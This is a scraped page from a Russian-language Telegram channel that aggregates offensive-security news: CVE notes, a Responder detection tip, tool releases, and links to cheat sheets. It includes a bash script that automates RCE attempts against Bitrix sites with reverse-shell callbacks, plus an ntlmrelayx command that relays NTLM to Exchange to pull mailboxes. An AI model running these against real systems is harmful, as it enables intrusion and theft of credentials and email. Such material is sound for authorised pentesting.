Pentester's Backlog
590 subscribers
313 photos
15 videos
44 files
426 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
Atlassian молодцы, на 9 из 10 (в смысле, по критичности уязвимостей)

CVE-2023-22522: Template injection flaw allowing authenticated users, including those with anonymous access, to inject unsafe input into a Confluence page (critical, with a 9.0 severity score). The flaw impacts all Confluence Data Center and Server versions after 4.0.0 and up to 8.5.3.
CVE-2023-22523: Privileged RCE in Assets Discovery agent impacting Jira Service Management Cloud, Server, and Data Center (critical, with a 9.8 severity score). Vulnerable Asset Discovery versions are anything below 3.2.0 for Cloud and 6.2.0 for Data Center and Server.
CVE-2023-22524: Bypass of blocklist and macOS Gatekeeper on the companion app for Confluence Server and Data Center for macOS, impacting all versions of the app prior to 2.0.0 (critical, with a 9.6 severity score).
CVE-2022-1471:  RCE in SnakeYAML library impacting multiple versions of Jira, Bitbucket, and Confluence products (critical, with a 9.8 severity score).
Forwarded from s0i37_channel
Responder является мощным атакующим инструментом, must-have для любого внутрянщика. Отвечая ложными ответами на широковещательные разрешения имён (например через NetBIOS) хакер может заставить вашу рабочую станцию подключиться куда угодно, и даже к нему самому. В итоге это приводит к ошибочным подключениям, с как правило автоматической сквозной аутентификацией. В свою очередь это разглашает учетные данные, которые могут быть подвергнуты bruteforce атаке, либо для обхода аутентификации с помощью NTLM-relay атак. Иногда с помощью responder удаётся даже проксировать веб трафик жертвы.
Так много атак... Но можно ли как то обнаружить responder?
Forwarded from s0i37_channel
Обнаружить responder проще простого. Достаточно лишь сгенерировать случайное короткое имя и спросить про него широковещательно. Если упрощённо, то - ping blablabla, если ответ есть - значит злоумышленник рядом с вами.
Forwarded from s0i37_channel
Скрипт https://github.com/s0i37/defence/blob/main/netbios.py делает эту проверку более точно. Он периодически шлёт в сеть широковещательно NetBIOS-запросы со случайными именами. И как только начинают поступать ответы - это сигнал что рядом с вами кто то запустил responder.
Защититься от атак responder это одно, но выявлять такие атаки - значит заметить внутреннего нарушителя на ранней стадии.
😴1
🫀 Один из самых простых и занятных "низко висящих фруктов" (наряду с данной вулной), встречающихся на проектах - CVE-2022-1026.

⚠️ Суть данной уязвимости заключается в том, что неаутентифицированный злоумышленник может обратиться на SOAP интерфейс устройства Kyocera с запросом адресной книги принтера. И устройство, в свою очередь, спокойно её отдаст (в формате XML), в ней могут храниться учетные записи (в том числе доменные), а также названия сетевых папок, когда-либо взаимодействовавших с данным устройством.

Remedations?
Дергайте принтер из розетки Отключайте SOAP-интерфейс (обычно, порт 9091)!

💻 POC для данной уязвимости

🔍 Подробнее о CVE-2022-1026
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4💅2🔥1
Forwarded from SecuriXy.kz
CrackMapExec - все...
переходим на NetExec

Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Execute Tasks on behalf of logged-on Users with Scheduled Tasks, BloodHound now supports computer accounts, FTP Enhancement, Module sorting, WinRM improvements и др

https://www.netexec.wiki

Ставиться проще простого через pipx

apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec


Запускается тоже просто

NetExec
nxc
nxcdb
netexec

nxcdb


Для простоты восприятия можете добавить ~/.zshrc

alias cme=netexec
alias crackmapexec=netexec
Forwarded from Похек (Sergey Zybnev)
quick-tricks
9 MB
🔥 quick-trics_auto.sh

Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚
Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.

#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT

for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
quick-tricks redirect -u $(sed -n "$i p" scope.txt)
quick-tricks lfi -u $(sed -n "$i p" scope.txt)
quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done


🍷 Написал скрипт так, чтобы вы его просто запустили, а дальше ушли пить чай.

Но скорее всего у вас вообще не окажется quick-tricks, т.к. автор зачем-то удалил/скрыл репозиторий. Поэтому к этому посту я прикреплю бинарь этого инструмента под Linux.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥1💔1
Forwarded from Похек (Sergey Zybnev)
NTLM to password
#windows

https://ntlm.pw/

thx snovvcrash


🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Proxy Bar
CVE-2023-6553 Exploit
Плагин Backup Migration для WordPress , RCE до версии 1.3.7 включительно
*
exploit


#wordpress #rce
MireaCTF finals
Пока так 👍
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3🥴1
Pentester's Backlog
MireaCTF finals Пока так 👍
По итогу финалов занимаем почётное 3-е место в официальном зачёте (на скрине общий).

Жанр Attack-Defense сам по себе очень интересен, заставляет не только поломать сервисы, но и поправить их (причём в довольно быстром ритме, всё же лидерборд не стоит на месте 🐈), и вся эта ред/блю тимерская суета принесла много положительных эмоций

kurilka ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21
😳 Большое спасибо за первую сотню.

Дальше - больше, лучше, качественнее, информативней и оперативнее!

☠️ Открыл комментарии к постам!
Please open Telegram to view this post
VIEW IN TELEGRAM
💊3🔥1
Forwarded from true_security
первый релиз описанного выше модуля (целиком со всем проектом impacket):
https://github.com/feedb/impacket_ews
Возможно. у кого то найдется время и желание потестировать и закинуть запрос на добавление/улучшение.
запуск:
ntlmrelayx.py -smb2support -t https://exchange.com/EWS/exchange.asmx --ews --folder inbox
папки могут быть: inbox, drafts, sentItems, outbox, deletedItems
по дефолту качает inbox
Forwarded from SecuriXy.kz
#SMTP Smuggling - #Spoofing E-Mails Worldwide

Вы просто прочитайте ответы вендоров:

Microsoft
"Thank you again for submitting this issue to Microsoft. Currently, MSRC prioritizes vulnerabilities that are assessed as “Important” or “Critical'’ severities for immediate servicing"

Cisco
"As previously mentioned, the "vulnerability" in Cisco Secure Email (Cloud) Gateway is not a bug, but a feature"

Нет слов, держите штаны покрепче...

https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/
Forwarded from Cybred
Курс Red Team Operations with Cobalt Strike

Cobalt Strike — известный фреймворк пост-эксплуатации, предназначенный для выполнения целевых атак, имитации продвинутых действий хакеров, а также доставки полезной нагрузки на компьютеры жертв.

Операции Red Team позволяют максимально натуралистично имитировать атаку группы профессиональных внешних нарушителей для выявления уязвимостей инфраструктуры.

В этом курсе вы узнаете, как использовать Cobalt Strike в качестве инфраструктуры управления и контроля (C2), использовать маячки (beacon'ы) и специализированные профили для проведения необходимых техник Red Team и тестирования на проникновение.

Содержание курса:
Operations: настройка сервера команды, глубокое погружения в модель Cobalt Strike для долгосрочных распределенных операций

Infrastructure: управление листенерами и настройка различных вариантов маячков

C2: введение в Malleable C2 — язык Cobalt Strike, предназначенный для настройки сетевых индикаторов

Weaponization: объединение полезной нагрузки с артефактом или эксплойтом, который ее запускает, введение в Artifact Kit и Resource Kit

Initial Access: веб-уязвимости и целевой фишинг

Post Exploitation: как управлять маячками и сеансами, выполнять команды, извлекать данные; регистрировать нажатия клавиш, делать скриншоты, техники пост-эксплуатации.

Privilege Escalation: представлен набор Elevate Kit, рассказывается об использовании SharpUp для поиска неправильных конфигураций и о том, как повысить права с помощью учетных данных; Kerberoasting и использование mimikatz

Lateral Movement: научитесь красть токены, проводить атаку pass-the-hash и генерировать "золотые билеты" Kerberos

Pivoting: как туннелировать Metasploit® Framework и другие инструменты через SOCKS-прокси
Дорогие друзья, поздравляю вас с наступившим 2024 годом! 🎉
3💊3🥴1😡1
Forwarded from Caster
Рад представить вам монструозный читшит по MITM-атакам

Caster - MITMonster

Genre: Offensive, Defensive
Subgenre: MITM Attacks, MITM Attacks Protection
Label: github.com
Release Date: 1 January 2024

Link: https://github.com/wearecaster/MITMonster
😡1
Internal All The Things - Internal pentest cheatsheet by swisskyrepo

https://swisskyrepo.github.io/InternalAllTheThings/